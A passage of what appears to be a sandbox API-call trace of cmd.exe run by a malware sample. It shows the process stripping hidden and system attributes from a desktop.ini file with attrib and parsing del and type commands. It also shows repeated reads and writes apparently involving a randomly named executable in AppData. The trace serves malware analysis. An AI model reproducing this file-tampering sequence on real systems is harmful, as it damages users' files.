cchData=128 | out: lpLCData="0") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afab8, cchData=128 | out: lpLCData="0") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afab8, cchData=128 | out: lpLCData="1") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 
[0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0211.034] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0211.035] GetConsoleTitleW (in: lpConsoleTitle=0x460aa8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.035] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0211.035] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0211.035] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0211.035] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0211.036] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0211.036] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0211.036] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0211.036] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0211.036] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0211.036] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0211.036] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0211.038] _wcsicmp (_String1="del", _String2=")") returned 59 [0211.038] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0211.038] _wcsicmp (_String1="FOR/?", _String2="del") 
returned 2 [0211.038] _wcsicmp (_String1="IF", _String2="del") returned 5 [0211.038] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0211.038] _wcsicmp (_String1="REM", _String2="del") returned 14 [0211.038] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0211.040] _wcsicmp (_String1="type", _String2=")") returned 75 [0211.040] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0211.040] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0211.040] _wcsicmp (_String1="IF", _String2="type") returned -11 [0211.040] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0211.040] _wcsicmp (_String1="REM", _String2="type") returned -2 [0211.040] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0211.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.062] FindClose (in: hFindFile=0x472540 | out: hFindFile=0x472540) returned 1 [0211.063] FindClose (in: hFindFile=0x472540 | out: hFindFile=0x472540) returned 1 [0211.063] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.063] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.063] GetConsoleTitleW (in: lpConsoleTitle=0x2af4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.063] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af368, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af430 | out: lpAttributeList=0x2af368, lpSize=0x2af430) returned 1 [0211.063] UpdateProcThreadAttribute (in: lpAttributeList=0x2af368, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af428, cbSize=0x4, lpPreviousValue=0x0, 
lpReturnSize=0x0 | out: lpAttributeList=0x2af368, lpPreviousValue=0x0) returned 1 [0211.063] GetStartupInfoW (in: lpStartupInfo=0x2af324 | out: lpStartupInfo=0x2af324*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0211.063] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.064] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af3c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af410 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessInformation=0x2af410*(hProcess=0x50, hThread=0x4c, dwProcessId=0x974, dwThreadId=0x898)) returned 1 [0211.073] CloseHandle (hObject=0x4c) returned 1 [0211.073] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.073] GetEnvironmentStringsW () returned 0x470920* [0211.073] FreeEnvironmentStringsW (penv=0x470920) returned 1 [0211.073] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0211.111] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af304 | out: lpExitCode=0x2af304*=0x0) returned 1 [0211.111] CloseHandle (hObject=0x50) 
returned 1 [0211.111] _vsnwprintf (in: _Buffer=0x2af44c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af310 | out: _Buffer="00000000") returned 8 [0211.111] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.111] GetEnvironmentStringsW () returned 0x4725b0* [0211.111] FreeEnvironmentStringsW (penv=0x4725b0) returned 1 [0211.112] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.112] GetEnvironmentStringsW () returned 0x4725b0* [0211.112] FreeEnvironmentStringsW (penv=0x4725b0) returned 1 [0211.112] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af368 | out: lpAttributeList=0x2af368) [0211.112] GetConsoleTitleW (in: lpConsoleTitle=0x2af6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\links\\desktop.ini")) returned 0x20 [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links" (normalized: "c:\\users\\default\\favori~1\\links")) returned 0x11 [0211.112] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0211.112] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\links\\desktop.ini")) returned 0x20 [0211.113] FindNextFileW (in: hFindFile=0x46e640, lpFindFileData=0x47363c | out: lpFindFileData=0x47363c) returned 0 [0211.113] GetLastError () returned 0x12 [0211.113] FindClose (in: hFindFile=0x46e640 | out: hFindFile=0x46e640) returned 1 [0211.114] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0211.114] GetConsoleTitleW (in: lpConsoleTitle=0x2af684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.115] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" 
(normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0211.115] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.116] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.116] GetFileType (hFile=0x50) returned 0x1 [0211.116] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.116] GetFileType (hFile=0x50) returned 0x1 [0211.116] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.116] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] GetFileType (hFile=0x50) returned 0x1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] GetFileType (hFile=0x50) returned 0x1 [0211.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.117] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 
[0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] GetFileType (hFile=0x50) returned 0x1 [0211.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.118] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.118] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.118] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.119] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.119] GetFileType (hFile=0x50) returned 0x1 [0211.119] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.120] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.120] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType 
(hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.120] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.120] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.121] SetFilePointerEx (in: hFile=0x58, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.121] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.121] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, 
lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.122] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.122] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 
[0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.122] GetFileType (hFile=0x50) returned 0x1 [0211.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, 
